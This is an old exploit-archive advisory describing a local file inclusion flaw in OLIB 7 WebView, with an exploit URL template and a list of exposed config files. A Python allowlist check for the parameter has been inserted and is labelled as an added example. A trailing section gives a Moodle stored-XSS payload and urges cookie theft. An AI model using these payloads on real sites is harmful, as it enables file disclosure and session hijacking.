# Title : OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability
# Published : 2008-10-02
# Author : ZeN
Security Advisory for 'OLIB 7 Webview'
This software is a part of Moodle.
Software - OLIB 7 WebView v2.5.1.1
Exploit - LFI
Severity - High
Author - ZeN
website - http://dusecurity.com/
Date - 2nd October 2008
DUSecurity Team / DarkCode
Exploit >
http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]
Files in dir - get_settings.ini, setup.ini (contains config file locations), text.ini
Info - You need to log in to get a valid session key.
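A server-side check for the infile parameter described above, as an added example that is not part of the original advisory or of OLIB's own code. The template names in ALLOWED_INFILES and the function names are assumptions; the .ini file names are the ones the advisory lists.

```python
import os
import tempfile

# Hypothetical template names: the advisory does not list WebView's legitimate infile values.
ALLOWED_INFILES = {"search.htm", "results.htm"}

class InfileRejected(ValueError):
    """Raised when a requested infile must not be served."""

def resolve_infile(base_dir, infile):
    """Return the real path for an allowed infile, or raise InfileRejected."""
    if not infile or "\x00" in infile:
        raise InfileRejected("empty value or NUL byte")
    # Only a bare file name is accepted: no directories, drive letters or dot entries.
    if infile in (".", "..") or any(c in infile for c in "/\\:"):
        raise InfileRejected("path components are not allowed")
    # Allowlist, not denylist: setup.ini, get_settings.ini and text.ini share the
    # directory and are refused simply because they are not templates.
    if infile not in ALLOWED_INFILES:
        raise InfileRejected("not an allowed template")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, infile))
    # realpath follows symlinks, so a link that points outside base_dir is caught here.
    if os.path.commonpath([base, path]) != base or not os.path.isfile(path):
        raise InfileRejected("missing or outside the template directory")
    return path

def check(base_dir, infile):
    """Return 'served' or the rejection reason, for logging and tests."""
    try:
        resolve_infile(base_dir, infile)
        return "served"
    except InfileRejected as exc:
        return str(exc)

def demo():
    """Build a constructed directory like the one the advisory lists and probe it."""
    with tempfile.TemporaryDirectory() as base:
        for name in ("search.htm", "setup.ini", "get_settings.ini", "text.ini"):
            with open(os.path.join(base, name), "w") as fh:
                fh.write("constructed sample\n")
        probes = ["search.htm", "setup.ini", "../setup.ini", "/etc/hosts", "results.htm"]
        return {p: check(base, p) for p in probes}

if __name__ == "__main__":
    for value, outcome in demo().items():
        print(f"{value!r}: {outcome}")
```

Logging the rejection reason together with the session key gives a usable detection signal, since the advisory notes that a valid login is required to reach this parameter.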
------------------
Extraz :
Moodle Permanent XSS
In the Moodle blogging system, simply make a new blog entry with the title
<script>alert()</script>
Now everyone that visits the blogging system will execute your XSS.
Go get some cookies =D
Enjoy!
------------------
Shouts :-
DUSecurity.com
DarkCode.me
Milw0rm.com
iWannaHack
WL-Group
# www.Syue.com [2008-10-02]